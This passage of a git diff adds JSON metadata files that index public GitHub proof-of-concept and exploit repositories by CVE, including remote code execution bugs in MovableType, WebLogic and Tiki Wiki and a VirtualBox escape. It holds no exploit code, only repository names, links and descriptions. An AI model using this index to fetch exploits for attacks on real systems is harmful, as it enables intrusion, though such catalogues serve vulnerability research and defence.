"cves", + "local-privilege-escalation" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20294.json b/2021/CVE-2021-20294.json new file mode 100644 index 0000000000..d7127b3dfa --- /dev/null +++ b/2021/CVE-2021-20294.json @@ -0,0 +1,33 @@ +[ + { + "id": 591711046, + "name": "CVE-2021-20294-POC", + "full_name": "tin-z\/CVE-2021-20294-POC", + "owner": { + "login": "tin-z", + "id": 32848129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32848129?v=4", + "html_url": "https:\/\/github.com\/tin-z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tin-z\/CVE-2021-20294-POC", + "description": "Simple CVE-2021-20294 poc", + "fork": false, + "created_at": "2023-01-21T16:15:21Z", + "updated_at": "2024-08-03T22:39:37Z", + "pushed_at": "2023-01-21T22:37:16Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20323.json b/2021/CVE-2021-20323.json new file mode 100644 index 0000000000..a02c7086e2 --- /dev/null +++ b/2021/CVE-2021-20323.json @@ -0,0 +1,106 @@ +[ + { + "id": 575588355, + "name": "CVE-2021-20323", + "full_name": "ndmalc\/CVE-2021-20323", + "owner": { + "login": "ndmalc", + "id": 99986367, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99986367?v=4", + "html_url": "https:\/\/github.com\/ndmalc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ndmalc\/CVE-2021-20323", + "description": null, + "fork": false, + "created_at": "2022-12-07T21:15:23Z", + "updated_at": "2024-11-09T03:13:05Z", + "pushed_at": "2022-12-07T21:26:44Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742027806, + "name": "CVE-2021-20323", + "full_name": "Cappricio-Securities\/CVE-2021-20323", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2021-20323", + "description": "A POST based reflected Cross Site Scripting vulnerability on has been identified in Keycloak.", + "fork": false, + "created_at": "2024-01-11T16:02:07Z", + "updated_at": "2024-07-25T00:10:06Z", + "pushed_at": "2024-06-21T06:51:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-20323", + "keycloak", + "websecurity", + "xss", + "xss-vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 825485916, + "name": "CVE-2021-20323", + "full_name": "cscpwn0sec\/CVE-2021-20323", + "owner": { + "login": "cscpwn0sec", + "id": 173960819, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173960819?v=4", + "html_url": "https:\/\/github.com\/cscpwn0sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cscpwn0sec\/CVE-2021-20323", + "description": "Exploitation Scanner Cross Site Scripting vulnerability in Keycloak.", + "fork": false, + "created_at": "2024-07-07T23:02:00Z", + "updated_at": "2024-07-14T08:59:15Z", + "pushed_at": "2024-07-14T08:59:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cross-site-scripting-xss", + "cve-2021-20323", + "keycloak-vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20717.json b/2021/CVE-2021-20717.json new file mode 100644 index 0000000000..6763ff09fe --- /dev/null +++ b/2021/CVE-2021-20717.json @@ -0,0 +1,33 @@ +[ + { + "id": 371916803, + "name": "CVE-2021-20717", + "full_name": "s-index\/CVE-2021-20717", + "owner": { + "login": "s-index", + "id": 56715563, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4", + "html_url": "https:\/\/github.com\/s-index", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s-index\/CVE-2021-20717", + "description": "CVE-2021-20717-EC-CUBE-XSS", + "fork": false, + "created_at": "2021-05-29T08:08:21Z", + "updated_at": "2022-09-27T16:28:51Z", + "pushed_at": "2021-05-29T08:12:04Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-20837.json b/2021/CVE-2021-20837.json new file mode 100644 index 0000000000..54e297f55f --- /dev/null +++ b/2021/CVE-2021-20837.json @@ -0,0 +1,160 @@ +[ + { + "id": 421189251, + "name": "cve-2021-20837-poc", + "full_name": "ghost-nemesis\/cve-2021-20837-poc", + "owner": { + "login": "ghost-nemesis", + "id": 81393565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81393565?v=4", + "html_url": "https:\/\/github.com\/ghost-nemesis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ghost-nemesis\/cve-2021-20837-poc", + "description": "PoC for the CVE-2021-20837 : RCE in MovableType", + "fork": false, + "created_at": "2021-10-25T21:25:39Z", + "updated_at": "2024-08-12T20:17:32Z", + "pushed_at": "2021-10-26T00:34:54Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422835153, + "name": "CVE-2021-20837", + "full_name": "orangmuda\/CVE-2021-20837", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-20837", + "description": "XMLRPC - RCE in MovableTypePoC", + "fork": false, + "created_at": "2021-10-30T09:15:56Z", + "updated_at": "2024-08-12T20:17:39Z", + "pushed_at": "2022-03-21T13:23:03Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-20837", + "xmlrpc-api" + ], + "visibility": "public", + "forks": 10, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 423476431, + "name": "CVE-2021-20837", + "full_name": "Cosemz\/CVE-2021-20837", + "owner": { + "login": "Cosemz", + "id": 38556609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38556609?v=4", + "html_url": "https:\/\/github.com\/Cosemz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cosemz\/CVE-2021-20837", + "description": "MovableType XMLRPC - RCE", + "fork": false, + "created_at": "2021-11-01T13:32:57Z", + "updated_at": "2021-11-02T09:10:19Z", + "pushed_at": "2021-11-02T09:10:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438109938, + "name": "CVE-2021-20837", + "full_name": "bb33bb\/CVE-2021-20837", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2021-20837", + "description": "Unauthenticated RCE In MovableType", + "fork": false, + "created_at": "2021-12-14T03:54:28Z", + "updated_at": "2022-04-03T09:27:17Z", + "pushed_at": "2021-11-27T01:02:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 885783760, + "name": "CVE-2021-20837", + "full_name": "lamcodeofpwnosec\/CVE-2021-20837", + "owner": { + "login": "lamcodeofpwnosec", + "id": 47277287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47277287?v=4", + "html_url": "https:\/\/github.com\/lamcodeofpwnosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lamcodeofpwnosec\/CVE-2021-20837", + "description": "XMLRPC RCE via MovableTypePoC CVE-2021-20837", + "fork": false, + "created_at": "2024-11-09T11:43:22Z", + "updated_at": "2024-11-09T17:54:22Z", + "pushed_at": "2024-11-09T11:43:44Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21014.json b/2021/CVE-2021-21014.json new file mode 100644 index 0000000000..d4becaf19d --- /dev/null +++ b/2021/CVE-2021-21014.json @@ -0,0 +1,33 @@ +[ + { + "id": 338510801, + "name": "CVE-2021-21014", + "full_name": "HoangKien1020\/CVE-2021-21014", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2021-21014", + "description": "Magento versions 2.4.1 (and earlier), 2.4.0-p1 (and earlier) and 2.3.6 (and earlier) are vulnerable to a file upload restriction bypass. Successful exploitation could lead to arbitrary code execution by an authenticated attacker.", + "fork": false, + "created_at": "2021-02-13T06:16:39Z", + "updated_at": "2024-08-12T20:10:20Z", + "pushed_at": "2021-02-13T06:30:25Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21017.json b/2021/CVE-2021-21017.json new file mode 100644 index 0000000000..63e2842e50 --- /dev/null +++ b/2021/CVE-2021-21017.json @@ -0,0 +1,64 @@ +[ + { + "id": 342597395, + "name": "CVE-2021-21017", + "full_name": "ZeusBox\/CVE-2021-21017", + "owner": { + "login": "ZeusBox", + "id": 78951067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78951067?v=4", + "html_url": "https:\/\/github.com\/ZeusBox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZeusBox\/CVE-2021-21017", + "description": null, + "fork": false, + "created_at": "2021-02-26T14:18:13Z", + "updated_at": "2024-08-12T20:10:42Z", + "pushed_at": "2021-02-27T09:57:00Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 44, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475487342, + "name": "CVE-2021-21017", + "full_name": "tzwlhack\/CVE-2021-21017", + "owner": { + "login": "tzwlhack", + "id": 86322859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86322859?v=4", + "html_url": "https:\/\/github.com\/tzwlhack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tzwlhack\/CVE-2021-21017", + "description": null, + "fork": false, + "created_at": "2022-03-29T14:45:16Z", + "updated_at": "2022-03-29T14:45:28Z", + "pushed_at": "2022-03-29T14:45:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21042.json b/2021/CVE-2021-21042.json new file mode 100644 index 0000000000..53215c94e8 --- /dev/null +++ b/2021/CVE-2021-21042.json @@ -0,0 +1,64 @@ +[ + { + "id": 344380474, + "name": "CVE-2021-21042", + "full_name": "NattiSamson\/CVE-2021-21042", + "owner": { + "login": "NattiSamson", + "id": 45117900, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45117900?v=4", + "html_url": "https:\/\/github.com\/NattiSamson", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NattiSamson\/CVE-2021-21042", + "description": "Exploit code for CVE-2021-21042", + "fork": false, + "created_at": "2021-03-04T07:01:08Z", + "updated_at": "2024-03-05T16:34:39Z", + "pushed_at": "2021-03-04T07:05:01Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 432305625, + "name": "CVE-2021-21042", + "full_name": "r1l4-i3pur1l4\/CVE-2021-21042", + "owner": { + "login": "r1l4-i3pur1l4", + "id": 76409019, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76409019?v=4", + "html_url": "https:\/\/github.com\/r1l4-i3pur1l4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r1l4-i3pur1l4\/CVE-2021-21042", + "description": null, + "fork": false, + "created_at": "2021-11-26T21:31:18Z", + "updated_at": "2022-06-30T15:56:28Z", + "pushed_at": "2021-11-27T15:09:03Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21086.json b/2021/CVE-2021-21086.json new file mode 100644 index 0000000000..777143e9b2 --- /dev/null +++ b/2021/CVE-2021-21086.json @@ -0,0 +1,33 @@ +[ + { + "id": 434332397, + "name": "Exploit-CVE-2021-21086", + "full_name": "infobyte\/Exploit-CVE-2021-21086", + "owner": { + "login": "infobyte", + "id": 4226354, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4226354?v=4", + "html_url": "https:\/\/github.com\/infobyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/infobyte\/Exploit-CVE-2021-21086", + "description": null, + "fork": false, + "created_at": "2021-12-02T18:30:53Z", + "updated_at": "2024-09-12T13:54:18Z", + "pushed_at": "2021-12-02T18:46:48Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 27, + "score": 0, + "subscribers_count": 11 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2109.json b/2021/CVE-2021-2109.json new file mode 100644 index 0000000000..e39d40584f --- /dev/null +++ b/2021/CVE-2021-2109.json @@ -0,0 +1,193 @@ +[ + { + "id": 331847444, + "name": "CVE-2021-2109", + "full_name": "Al1ex\/CVE-2021-2109", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-2109", + "description": "CVE-2021-2109 && Weblogic Server RCE via JNDI", + "fork": false, + "created_at": "2021-01-22T05:37:11Z", + "updated_at": "2024-08-12T20:09:39Z", + "pushed_at": "2021-01-22T05:52:26Z", + "stargazers_count": 30, + "watchers_count": 30, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-2109", + "jndi", + "rce", + "weblogic" + ], + "visibility": "public", + "forks": 10, + "watchers": 30, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 331873303, + "name": "CVE-2021-2109", + "full_name": "rabbitsafe\/CVE-2021-2109", + "owner": { + "login": "rabbitsafe", + "id": 33046073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33046073?v=4", + "html_url": "https:\/\/github.com\/rabbitsafe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rabbitsafe\/CVE-2021-2109", + "description": null, + "fork": false, + "created_at": "2021-01-22T07:43:46Z", + "updated_at": "2024-08-12T20:09:39Z", + "pushed_at": "2021-01-22T08:34:11Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 367086891, + "name": "CVE-2021-2109_poc", + "full_name": "yuaneuro\/CVE-2021-2109_poc", + "owner": { + "login": "yuaneuro", + "id": 42265015, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42265015?v=4", + "html_url": "https:\/\/github.com\/yuaneuro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yuaneuro\/CVE-2021-2109_poc", + "description": "weblogic CVE-2021-2109批量验证poc", + "fork": false, + "created_at": "2021-05-13T15:10:03Z", + "updated_at": "2024-08-12T20:12:58Z", + "pushed_at": "2021-05-14T04:27:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 394257292, + "name": "CVE-2021-2109", + "full_name": "dinosn\/CVE-2021-2109", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/CVE-2021-2109", + "description": "CVE-2021-2109 basic scanner", + "fork": false, + "created_at": "2021-08-09T11:02:45Z", + "updated_at": "2024-08-12T20:15:25Z", + "pushed_at": "2021-08-09T11:33:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 475591127, + "name": "CVE-2021-2109", + "full_name": "lnwza0x0a\/CVE-2021-2109", + "owner": { + "login": "lnwza0x0a", + "id": 96345719, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96345719?v=4", + "html_url": "https:\/\/github.com\/lnwza0x0a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lnwza0x0a\/CVE-2021-2109", + "description": null, + "fork": false, + "created_at": "2022-03-29T19:29:29Z", + "updated_at": "2022-03-29T21:05:01Z", + "pushed_at": "2022-03-29T21:04:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 530633500, + "name": "oracle-weblogic-CVE-2021-2109", + "full_name": "Vulnmachines\/oracle-weblogic-CVE-2021-2109", + "owner": { + "login": "Vulnmachines", + "id": 79006904, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79006904?v=4", + "html_url": "https:\/\/github.com\/Vulnmachines", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Vulnmachines\/oracle-weblogic-CVE-2021-2109", + "description": "Oracle Weblogic RCE - CVE-2022-2109", + "fork": false, + "created_at": "2022-08-30T11:50:17Z", + "updated_at": "2023-01-11T16:07:19Z", + "pushed_at": "2022-08-30T11:52:05Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21110.json b/2021/CVE-2021-21110.json new file mode 100644 index 0000000000..837ece2ebb --- /dev/null +++ b/2021/CVE-2021-21110.json @@ -0,0 +1,33 @@ +[ + { + "id": 340540711, + "name": "CVE-2021-21110", + "full_name": "Gh0st0ne\/CVE-2021-21110", + "owner": { + "login": "Gh0st0ne", + "id": 47971115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47971115?v=4", + "html_url": "https:\/\/github.com\/Gh0st0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gh0st0ne\/CVE-2021-21110", + "description": "CVE-2021-21110 : Tiki Wiki CMS GroupWare Serverside Template Injection Remote Code Execution Exploit", + "fork": false, + "created_at": "2021-02-20T02:19:40Z", + "updated_at": "2024-09-28T09:19:47Z", + "pushed_at": "2021-02-20T02:20:48Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21123.json b/2021/CVE-2021-21123.json new file mode 100644 index 0000000000..7e249deb09 --- /dev/null +++ b/2021/CVE-2021-21123.json @@ -0,0 +1,48 @@ +[ + { + "id": 350325088, + "name": "CVE-2021-21123-PoC-Google-Chrome", + "full_name": "Puliczek\/CVE-2021-21123-PoC-Google-Chrome", + "owner": { + "login": "Puliczek", + "id": 12344862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12344862?v=4", + "html_url": "https:\/\/github.com\/Puliczek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Puliczek\/CVE-2021-21123-PoC-Google-Chrome", + "description": "🐱‍💻 👍 Google Chrome - File System Access API - vulnerabilities reported by Maciej Pulikowski | Total Bug Bounty Reward: $5.000 | CVE-2021-21123 and 5 more...", + "fork": false, + "created_at": "2021-03-22T11:53:57Z", + "updated_at": "2024-11-11T16:02:36Z", + "pushed_at": "2021-03-22T18:24:20Z", + "stargazers_count": 165, + "watchers_count": 165, + "has_discussions": false, + "forks_count": 26, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-writeups", + "bugbountytips", + "cve", + "cybersecurity", + "exploit", + "hacking", + "payload", + "pentesing", + "pentest", + "red-team", + "security", + "security-writeups", + "writeups" + ], + "visibility": "public", + "forks": 26, + "watchers": 165, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21148.json b/2021/CVE-2021-21148.json new file mode 100644 index 0000000000..d047a01520 --- /dev/null +++ b/2021/CVE-2021-21148.json @@ -0,0 +1,33 @@ +[ + { + "id": 336754176, + "name": "CVE-2021-21148", + "full_name": "Grayhaxor\/CVE-2021-21148", + "owner": { + "login": "Grayhaxor", + "id": 74397435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74397435?v=4", + "html_url": "https:\/\/github.com\/Grayhaxor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Grayhaxor\/CVE-2021-21148", + "description": null, + "fork": false, + "created_at": "2021-02-07T09:59:47Z", + "updated_at": "2022-04-20T06:48:02Z", + "pushed_at": "2021-02-07T10:03:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-2119.json b/2021/CVE-2021-2119.json new file mode 100644 index 0000000000..bab387520a --- /dev/null +++ b/2021/CVE-2021-2119.json @@ -0,0 +1,95 @@ +[ + { + "id": 329979678, + "name": "RWCTF21-VirtualBox-61-escape", + "full_name": "Sauercloud\/RWCTF21-VirtualBox-61-escape", + "owner": { + "login": "Sauercloud", + "id": 41395211, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41395211?v=4", + "html_url": "https:\/\/github.com\/Sauercloud", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sauercloud\/RWCTF21-VirtualBox-61-escape", + "description": "0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020\/2021 CVE-2021-2119", + "fork": false, + "created_at": "2021-01-15T17:32:24Z", + "updated_at": "2024-10-09T21:12:00Z", + "pushed_at": "2021-01-23T01:25:22Z", + "stargazers_count": 138, + "watchers_count": 138, + "has_discussions": false, + "forks_count": 21, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 21, + "watchers": 138, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 471867550, + "name": "Sauercloude", + "full_name": "chatbottesisgmailh\/Sauercloude", + "owner": { + "login": "chatbottesisgmailh", + "id": 101959431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101959431?v=4", + "html_url": "https:\/\/github.com\/chatbottesisgmailh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chatbottesisgmailh\/Sauercloude", + "description": "0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020\/2021 CVE-2021-2119", + "fork": false, + "created_at": "2022-03-20T03:17:03Z", + "updated_at": "2022-03-20T03:17:04Z", + "pushed_at": "2022-03-20T03:17:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 477297752, + "name": "Sauercloude", + "full_name": "shi10587s\/Sauercloude", + "owner": { + "login": "shi10587s", + "id": 102901010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102901010?v=4", + "html_url": "https:\/\/github.com\/shi10587s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shi10587s\/Sauercloude", + "description": "0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020\/2021 CVE-2021-2119", + "fork": false, + "created_at": "2022-04-03T09:46:03Z", + "updated_at": "2022-04-03T09:46:03Z", + "pushed_at": "2022-04-03T09:46:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21193.json b/2021/CVE-2021-21193.json new file mode 100644 index 0000000000..aed9d66ca3 --- /dev/null +++ b/2021/CVE-2021-21193.json @@ -0,0 +1,33 @@ +[ + { + "id": 474836947, + "name": "CVE-2021-21193", + "full_name": "mehrzad1994\/CVE-2021-21193", + "owner": { + "login": "mehrzad1994", + "id": 19632843, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19632843?v=4", + "html_url": "https:\/\/github.com\/mehrzad1994", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mehrzad1994\/CVE-2021-21193", + "description": "introduction to hacking second presentation", + "fork": false, + "created_at": "2022-03-28T03:51:58Z", + "updated_at": "2022-03-28T03:51:58Z", + "pushed_at": "2022-03-28T13:06:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-21220.json b/2021/CVE-2021-21220.json new file mode 100644 index 0000000000..953af6e6a4 --- /dev/null +++ b/2021/CVE-2021-21220.json @@ -0,0 +1,33 @@ +[ + { + "id": 406597081, + "name": "CVE-2021-21220", + "full_name": "security-dbg\/CVE-2021-21220", + "owner": { + "login": "security-dbg", + "id": 82885694, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82885694?v=4", + "html_url": "https:\/\/github.com\/security-dbg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/security-dbg\/CVE-2021-21220", + "description": null, + "fork": false, + "created_at": "2021-09-15T03:11:41Z", + "updated_at": "2024-08-22T10:27:33Z", + "pushed_at": "2021-09-15T03:22:06Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 